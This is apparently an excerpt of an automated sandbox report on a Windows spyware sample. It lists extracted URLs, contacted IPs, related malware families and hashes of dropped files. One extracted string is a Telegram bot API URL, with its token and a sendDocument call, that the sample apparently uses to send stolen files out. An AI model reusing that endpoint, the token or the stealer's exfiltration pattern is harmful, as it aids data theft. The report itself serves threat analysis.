http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	test.exe, 00000001.00000003.228724835.0000000005790000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230936770.0000000005790000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
http://wwwsearch.sf.net/):	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ibm.com/	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	test.exe, 00000001.00000002.231304232.00000000064C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.openssl.org/H	file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003519000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232284330.00007FFD40C2A000.00000002.00000001.01000000.00000011.sdmp, test.exe, 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmp	false		high
http://bugs.python.org/issue14443z	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
http://www.iana.org/time-zones/repository/tz-link.html	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, test.exe, 00000001.00000002.231129087.00000000062A0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocumentP	test.exe, 00000001.00000002.231367576.0000000006660000.00000004.00001000.00020000.00000000.sdmp	false		high
http://docs.python.org/3/library/subprocess#subprocess.Popen.kill	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/dlopen.htm	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
https://upload.pypi.org/legacy/	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
http://logo.verisign.coz	test.exe, 00000001.00000003.228550797.00000000066E1000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231400935.00000000066E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://packaging.python.org/specifications/entry-points/	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
http://curl.haxx.se/rfc/cookie_spec.html	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
http://speleotrove.com/decimal/decarith.html	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false	URL Reputation: safe	unknown
http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
http://json.org	test.exe, 00000001.00000002.231004794.00000000057C3000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
34.117.59.81	ipinfo.io	United States		139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1301561
Start date and time:	2023-09-01 13:39:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal76.troj.spyw.evad.winEXE@19/44@2/2
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 1.2% (good quality ratio 0.7%) Quality average: 44.8% Quality standard deviation: 42.8%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, kv601.prod.do.dsp.mp.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, eudb.ris.api.iris.microsoft.com, tse1.mm.bing.net, arc.msn.com
Execution Graph export aborted for target test.exe, PID 6884 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	mods.exe	Get hash	malicious	XWorm	Browse
	Purchase_Order_from_SABO_S.A.pdf.exe	Get hash	malicious	AgentTesla	Browse
	Cseqnmh.exe	Get hash	malicious	Snake Keylogger	Browse
	7E8BlmnQXD.exe	Get hash	malicious	Gurcu Stealer	Browse
	anBi1ydqra.exe	Get hash	malicious	AgentTesla	Browse
	4ubc4EyPj4.exe	Get hash	malicious	DarkCloud	Browse
	t1aKQS1iLx.exe	Get hash	malicious	DarkCloud	Browse
	Uecqyndauhl.exe	Get hash	malicious	Snake Keylogger	Browse
	Lsgvg.exe	Get hash	malicious	Snake Keylogger	Browse
	Factura_1012123.exe	Get hash	malicious	AgentTesla	Browse
	Invoice#1012_.txt	Get hash	malicious	HTMLPhisher	Browse
	SecuriteInfo.com.Trojan.Siggen19.36002.3443.8527.exe	Get hash	malicious	AgentTesla, zgRAT	Browse
	K1wEC5xsnP.exe	Get hash	malicious	DCRat	Browse
	w77T7XgLqj.exe	Get hash	malicious	DCRat	Browse
	SecuriteInfo.com.Win32.PWSX-gen.14895.4336.exe	Get hash	malicious	AgentTesla	Browse
	Packing_List.xlam.xlsx	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse
	INV.PDF.exe	Get hash	malicious	DarkCloud	Browse
	Rlgmwu.exe	Get hash	malicious	Snake Keylogger	Browse
	KEdK7cfRii.exe	Get hash	malicious	Gurcu Stealer	Browse
	Bon8RXwP7S.exe	Get hash	malicious	Unknown	Browse
34.117.59.81	Bon8RXwP7S.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	CCiocj0tkz.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	7c.exe	Get hash	malicious	AsyncRAT, Blank Grabber, Clipboard Hijacker, EICAR, StormKitty, ToxicEye, WorldWind Stealer	Browse	ipinfo.io/json
	http://34.117.59.81	Get hash	malicious	Unknown	Browse	34.117.59.81/
	5b1d7866.exe	Get hash	malicious	RedLine	Browse	ipinfo.io/ip
	SecuriteInfo.com.Variant.Tedy.197311.29167.32662.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	iTop Easy Desktop_Setup_IU.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	sample.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	04451999.exe.lnk	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	o5QR1PuuAx.exe	Get hash	malicious	Orcus	Browse	ipinfo.io/ip
	SecuriteInfo.com.Win64.PWSX-gen.23885.14599.exe	Get hash	malicious	Bandit Stealer	Browse	ipinfo.io/country
	RcNRT1gqfb.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/country
	0Y3hOsXLQ0.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/country
	Info_9_may_3263893.js	Get hash	malicious	NetSupport RAT	Browse	ipinfo.io/ip
	Notice_3_may_7692707.js	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Notice_3_may_2248985.js	Get hash	malicious	NetSupport RAT	Browse	ipinfo.io/ip
	Notice_3_may_9755407.js	Get hash	malicious	NetSupport RAT	Browse	ipinfo.io/ip
	Notice_3_may.js	Get hash	malicious	NetSupport RAT	Browse	ipinfo.io/ip
	https://fossiil.com/tkw6f	Get hash	malicious	Phisher	Browse	ipinfo.io/ip
	Notice_3_may_1533151.js	Get hash	malicious	NetSupport RAT	Browse	ipinfo.io/ip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	factmarzosiinopagadasii.msi	Get hash	malicious	Unknown	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	file.exe	Get hash	malicious	000Stealer, Amadey, Glupteba, PrivateLoader, SmokeLoader	Browse	34.117.59.81
	8wndjJam6q.exe	Get hash	malicious	RedLine	Browse	34.117.59.81
	facnuevassimmarzo.msi	Get hash	malicious	Unknown	Browse	34.117.59.81
	DHL_Original_Documents.exe	Get hash	malicious	RedLine	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	CATALOG_SAMPLE.pdf.exe	Get hash	malicious	RedLine	Browse	34.117.59.81
	Invoice#1012_.txt	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	Invoice#1012_.html	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	K1wEC5xsnP.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	w77T7XgLqj.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	Bon8RXwP7S.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	Direct-Deposit.htm	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	m1BYl1X45U.exe	Get hash	malicious	PrivateLoader	Browse	34.117.59.81
	file.exe	Get hash	malicious	Amadey, Glupteba, PrivateLoader, SmokeLoader, Vidar, Xmrig	Browse	34.117.59.81
	d537ahU6oe.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	https://www.menti.com/aleehsdzay9h	Get hash	malicious	Unknown	Browse	34.117.59.81
	A-new orders.html	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	KPEnybWXL4.exe	Get hash	malicious	Vidar, onlyLogger	Browse	149.154.167.99
	file.exe	Get hash	malicious	Fabookie, PrivateLoader, RedLine, SmokeLoader, Tofsee	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Fabookie, Glupteba, PrivateLoader, RedLine, RisePro Stealer	Browse	149.154.167.99
	mods.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Purchase_Order_from_SABO_S.A.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Cseqnmh.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	7E8BlmnQXD.exe	Get hash	malicious	Gurcu Stealer	Browse	149.154.167.220
	anBi1ydqra.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	4ubc4EyPj4.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	t1aKQS1iLx.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	Uecqyndauhl.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Lsgvg.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Factura_1012123.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	download (21).vbs	Get hash	malicious	Unknown	Browse	149.154.167.99
	download (20).vbs	Get hash	malicious	Unknown	Browse	149.154.167.99
	download (18).vbs	Get hash	malicious	Unknown	Browse	149.154.167.99
	Invoice#1012_.txt	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Siggen19.36002.3443.8527.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	149.154.167.220
	K1wEC5xsnP.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	factmarzosiinopagadasii.msi	Get hash	malicious	Unknown	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	file.exe	Get hash	malicious	Fabookie, PrivateLoader, RedLine, SmokeLoader, Tofsee	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	file.exe	Get hash	malicious	000Stealer, Amadey, Glupteba, PrivateLoader, SmokeLoader	Browse	34.117.59.81
	http://pcapp.store	Get hash	malicious	Unknown	Browse	34.116.74.210
	file.exe	Get hash	malicious	Fabookie, Glupteba, PrivateLoader, RedLine, RisePro Stealer	Browse	34.117.59.81
	ttPpDvszAB.elf	Get hash	malicious	Mirai	Browse	34.66.227.69
	EWqGQSXGXE.elf	Get hash	malicious	Mirai	Browse	34.117.172.114
	8wndjJam6q.exe	Get hash	malicious	RedLine	Browse	34.117.59.81
	facnuevassimmarzo.msi	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://s5gi8q27.page.link/Zi7X	Get hash	malicious	Unknown	Browse	34.117.157.22
	http://download.asyncfox.xyz/download/dupa2.sh	Get hash	malicious	Unknown	Browse	34.117.121.53
	DHL_Original_Documents.exe	Get hash	malicious	RedLine	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	CATALOG_SAMPLE.pdf.exe	Get hash	malicious	RedLine	Browse	34.117.59.81
	Invoice#1012_.txt	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	Invoice#1012_.html	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	K1wEC5xsnP.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	yfySrYMRO8.exe	Get hash	malicious	PrivateLoader, RedLine	Browse	34.117.59.81

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_asyncio.pyd	autoddos_windows_v.3.0.exe	Get hash	malicious	Unknown	Browse
	checker_no_login.exe	Get hash	malicious	Unknown	Browse
	nuker.exe.exe	Get hash	malicious	Hog Grabber	Browse
	N0feIoyW43.exe	Get hash	malicious	Unknown	Browse
	PornHubPremium.exe	Get hash	malicious	Unknown	Browse
	Merge All PDF in This Dir.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_bz2.pyd	autoddos_windows_v.3.0.exe	Get hash	malicious	Unknown	Browse
	kindleunpack.exe	Get hash	malicious	Unknown	Browse
	checker_no_login.exe	Get hash	malicious	Unknown	Browse
	n.exe	Get hash	malicious	Unknown	Browse
	nuker.exe.exe	Get hash	malicious	Hog Grabber	Browse
	silent_vira.exe	Get hash	malicious	Wannacry	Browse
	silent_vira.exe	Get hash	malicious	Wannacry	Browse
	N0feIoyW43.exe	Get hash	malicious	Unknown	Browse
	PornHubPremium.exe	Get hash	malicious	Unknown	Browse
	Merge All PDF in This Dir.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_asyncio.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65936
Entropy (8bit):	5.982934147837842
Encrypted:	false
SSDEEP:	768:ZKscMg5w5Si1avox2OuaCFWuyLCsxWqJLmjxhUJqPhAw3VSOdIz5nhR6YiSyv2AA:l531dQOnOWuPz8qPmUjdIz5nP67SyOAA
MD5:	C39FA3D657D1376E002901314C94E77F
SHA1:	C2D4E593BF574B0CB10970D44FBD3EDD1A39A3AA
SHA-256:	FBDE7FB72842C392BD9282DDB65BB786FBC12D01AABF3DBCE83AB2F7565F2964
SHA-512:	88F35EF78E513C71615AF09EFA9772F6F9ECAEECE8CA8EAA99C591FFDB7E4AF7BB181E89C3CCFFD1538766B64E440017431C664B40A0B8766C3E6120CFA626FA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: autoddos_windows_v.3.0.exe, Detection: malicious, Browse Filename: checker_no_login.exe, Detection: malicious, Browse Filename: nuker.exe.exe, Detection: malicious, Browse Filename: N0feIoyW43.exe, Detection: malicious, Browse Filename: PornHubPremium.exe, Detection: malicious, Browse Filename: Merge All PDF in This Dir.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.}....................@.......@.......@.......@.........................................................Rich....................PE..d......a.........." .....`................................................... ......B.....`.........................................P...P.......d...................................@v..T............................v..8............p..0............................text...._.......`.................. ..`.rdata...J...p...L...d..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87440
Entropy (8bit):	6.441813255396942
Encrypted:	false
SSDEEP:	1536:D7Sz7efjsrb7QMpfQKeGPHMD6p4fr718EtABfx1iN3npFIztVGc7Syk:DeztXcUfAG/MD6pUr76Etax1iN3pFIzC
MD5:	C013236B137B64FF2F30DC0C2AF56084
SHA1:	3D600C348794B3116C0D3230A40672BE350142F7
SHA-256:	C435022D2CC868E26CDE10E7749862EE8A177FCED3289D49C3BC33AF0C949D3F
SHA-512:	8FC14CAFC32331AF3F04257EA38D562D419C2C8C89CCAA8ACE51593E708EC9CB27D9E1BD241BC717F929BD2D8C68AA78824AF6B5ADF1BDE0E25812EC4DE15852
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: autoddos_windows_v.3.0.exe, Detection: malicious, Browse Filename: kindleunpack.exe, Detection: malicious, Browse Filename: checker_no_login.exe, Detection: malicious, Browse Filename: n.exe, Detection: malicious, Browse Filename: nuker.exe.exe, Detection: malicious, Browse Filename: silent_vira.exe, Detection: malicious, Browse Filename: silent_vira.exe, Detection: malicious, Browse Filename: N0feIoyW43.exe, Detection: malicious, Browse Filename: PornHubPremium.exe, Detection: malicious, Browse Filename: Merge All PDF in This Dir.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>Ee.mEe.mEe.mL.<mOe.m...lGe.m#.RmFe.m...lIe.m...lMe.m...lAe.m...lFe.m...lGe.mEe.m%e.m...lMe.m...lDe.m..PmDe.m...lDe.mRichEe.m................PE..d.....a.........." .........f............................................................`..........................................&..H....&.......`.......P..4....6.......p...... ...T...............................8...............@............................text............................... ..`.rdata...B.......D..................@..@.data........@......................@....pdata..4....P....... ..............@..@.rsrc........`.......*..............@..@.reloc.......p.......4..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	127376
Entropy (8bit):	5.944310757155339
Encrypted:	false
SSDEEP:	3072:4s51kM2JpMk49dWZKrcsaIopEfrZMuAAIJIzQPS7A:3nkMoOwCc6frZiAI4A
MD5:	22CF43EACA1F0745896CCD7E8910F9E4
SHA1:	3DF4D9F7386A044943FDCEA6665ACC0A13ED9FCE
SHA-256:	AAF9F6487B618AEB15DFE7D77B3F0D58185718FD68631323E56392DDEF1D000F
SHA-512:	2E6D1CFABDA0F617CD3ACEF0A9255E4C56868E66A7545A36F2DA441EA27A40A45450887A48E0164A542FEC1D6AE59F2933C2B6D95A4EA5CF4D2C249A3E886E10
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........P...1c..1c..1c..I...1c..Db..1c..Df..1c..Dg..1c..D`..1c.vDb..1c..Cg..1c..Cb..1c.VXb..1c..1b.$1c.vDn..1c.vDc..1c.vD...1c.vDa..1c.Rich.1c.........................PE..d.....a.........." .................^..............................................^.....`..........................................d......te..........................................T........................... ...8............................................text............................... ..`.rdata...p.......r..................@..@.data...D?.......:...v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	270736
Entropy (8bit):	6.532637267707464
Encrypted:	false
SSDEEP:	6144:oHygqMkks6SO4BmzGc0HFISreUj9L+OyPIeZ9qWMa3pLW1AktsV4vNeTr4g:oMksVOKlf/LwPIa0K4g
MD5:	EA868D77EDD4FA3281048FDD45D5CDF4
SHA1:	E2617E46596A437E96F259A0D46323FF392EB6C9
SHA-256:	A3B5F473BDF602442444DE670B30D768E202B268209774D40C172EBA4E226624
SHA-512:	3568C1D3831CBCDEE5B8E2FB35833E794B82EA23762BDEDEE579591235BA3EF28747DCBF8CF35D802BA936570DA0A956B80F3913CC9FD5273D9068AE0610F727
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t!=.0@S.0@S.0@S.98..>@S.b5R.2@S.b5V.<@S.b5W.8@S.b5P.4@S..5R.3@S..2R.2@S.0@R..@S..5P.1@S..5^.?@S..5S.1@S..5..1@S..5Q.1@S.Rich0@S.................PE..d.....a.........." .........J...............................................0.......^....`............................................P... ....................-........... ..`...`...T...............................8...............(............................text.............................. ..`.rdata..............................@..@.data...X*.......$..................@....pdata...-..........................@..@.rsrc...............................@..@.reloc..`.... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_elementtree.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	189328
Entropy (8bit):	6.345351296567706
Encrypted:	false
SSDEEP:	3072:JAv3D8KUaoniQrh7/BW27prZi+WI8zJIOQ7nJfevUhpNJ+1kgLbTPg2wQrp1Iz1Z:SfCnjtrBD7prZ81IOW9UW0TdwQrpu
MD5:	786730C52978610C3E7B2D11EE956CB6
SHA1:	A8377D9C9EB15BB6B420BE9B18E56CB212006C02
SHA-256:	C400451C7264945B68606CC7802675F7AD32A480F2BB16419DE725D6C9C62FAD
SHA-512:	14CA67F653756789F6AF0467EBB8ABE8B4B7476A18399C50EE958E6EDA9B537985E80DB61CBC2887A396DC658DF48E3A73167C18179B8274F7DD707514A5DA40
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............j..j..j....j...k..j...o..j...n..j...i..j...k..j.y.k..j..k...j...g..j...j..j......j...h..j.Rich..j.........................PE..d.....a.........." ................D.....................................................`.............................................X...h...................................T...\|..T..............................8............ ...............................text...c........................... ..`.rdata...... ......................@..@.data... ...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65424
Entropy (8bit):	6.085275098621134
Encrypted:	false
SSDEEP:	1536:7t4H8ig7aoPLhLF+tUbVFFTUjYDaKmZhJBdIz5IX7SyY:7t4KFJV1mZhJBdIz5IXy
MD5:	96BDC361B3127F01EEFBF0B54DC2813A
SHA1:	F5900E228F6CCD1FE44A99A23CD27E6A71D2D88B
SHA-256:	95760D2F49B695CB0DC03720E2CDCE34D1215285023F2BB7690F268E434C7871
SHA-512:	6A9A481D130EEF5A98B5D2B40DDCA1D7AA83D7ABB255368F3FDCA85C395B0CD0711765143A6EC8F14696599CFD4876375449272F013969A59E7F26618A730B36
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....................................................i......H.........:...............................Rich............................PE..d.....a.........." .....^...........@....................................... ......zg....`............................................P... ...x...............................H...p{..T............................{..8............p..(............................text....\.......^.................. ..`.rdata..(S...p...T...b..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	163728
Entropy (8bit):	6.779160796897407
Encrypted:	false
SSDEEP:	3072:9aV4kBVeMMbwjQneCHPDLORDEKznfo9mNoQrL4rbFIze16j:9aV4kBVHMKQZrUDE8wYOQwrbC
MD5:	ECD60B380B7875D2521739E7ACF365FC
SHA1:	487FFDE1F1A31F321A87658D22A1763624600304
SHA-256:	1DCB9689A2A3EB1C2554CAEC217D4F6A10CF677701BCB6F762D6CC2111D14C4A
SHA-512:	37DB64611F7098C08089B17A88DB638EC329FA2B652689A3A7509566110AFE8ECA3AC5E047530D628503D713E15584AD376631576FA9D3E9EFB4A1CA0C3C1709
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................u............................Z......3.............Z......Z......Z......Z......Rich....................PE..d.....a.........." .....\|..........43....................................................`..........................................7..L...\7..x............`.......`..........4...x...T..............................8...............8............................text....z.......\|.................. ..`.rdata..R...........................@..@.data........P.......4..............@....pdata.......`.......<..............@..@.rsrc................T..............@..@.reloc..4............^..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_msi.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	40848
Entropy (8bit):	5.961140345816694
Encrypted:	false
SSDEEP:	768:nxuXazWXHkrkExfuKVW4q6CQxoUAIZdeoLuMIhaBLFIztGLYiSyvfh3cj:8KlnfuKVW4q6CZhaFFIztGL7Sytcj
MD5:	9882704FBEC1A23DB841E5EF66043C02
SHA1:	B5ACCD59E50B3A4AD7BC55C4F84DFE7FA9E5EE4E
SHA-256:	6907CF794A8F4FCDFC3C7F9B929F2D26D1838DA1D98A2C5A86D90084042CAB49
SHA-512:	9EB9FBA76347E0FCA41EA9291040A79CE40DC13AC97EDD3A5FD0791BC77EAD7C87E2D0E1ED842F8D57A050825DBBCF10A38CC695B5187D7A502A00A7B9BA4712
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
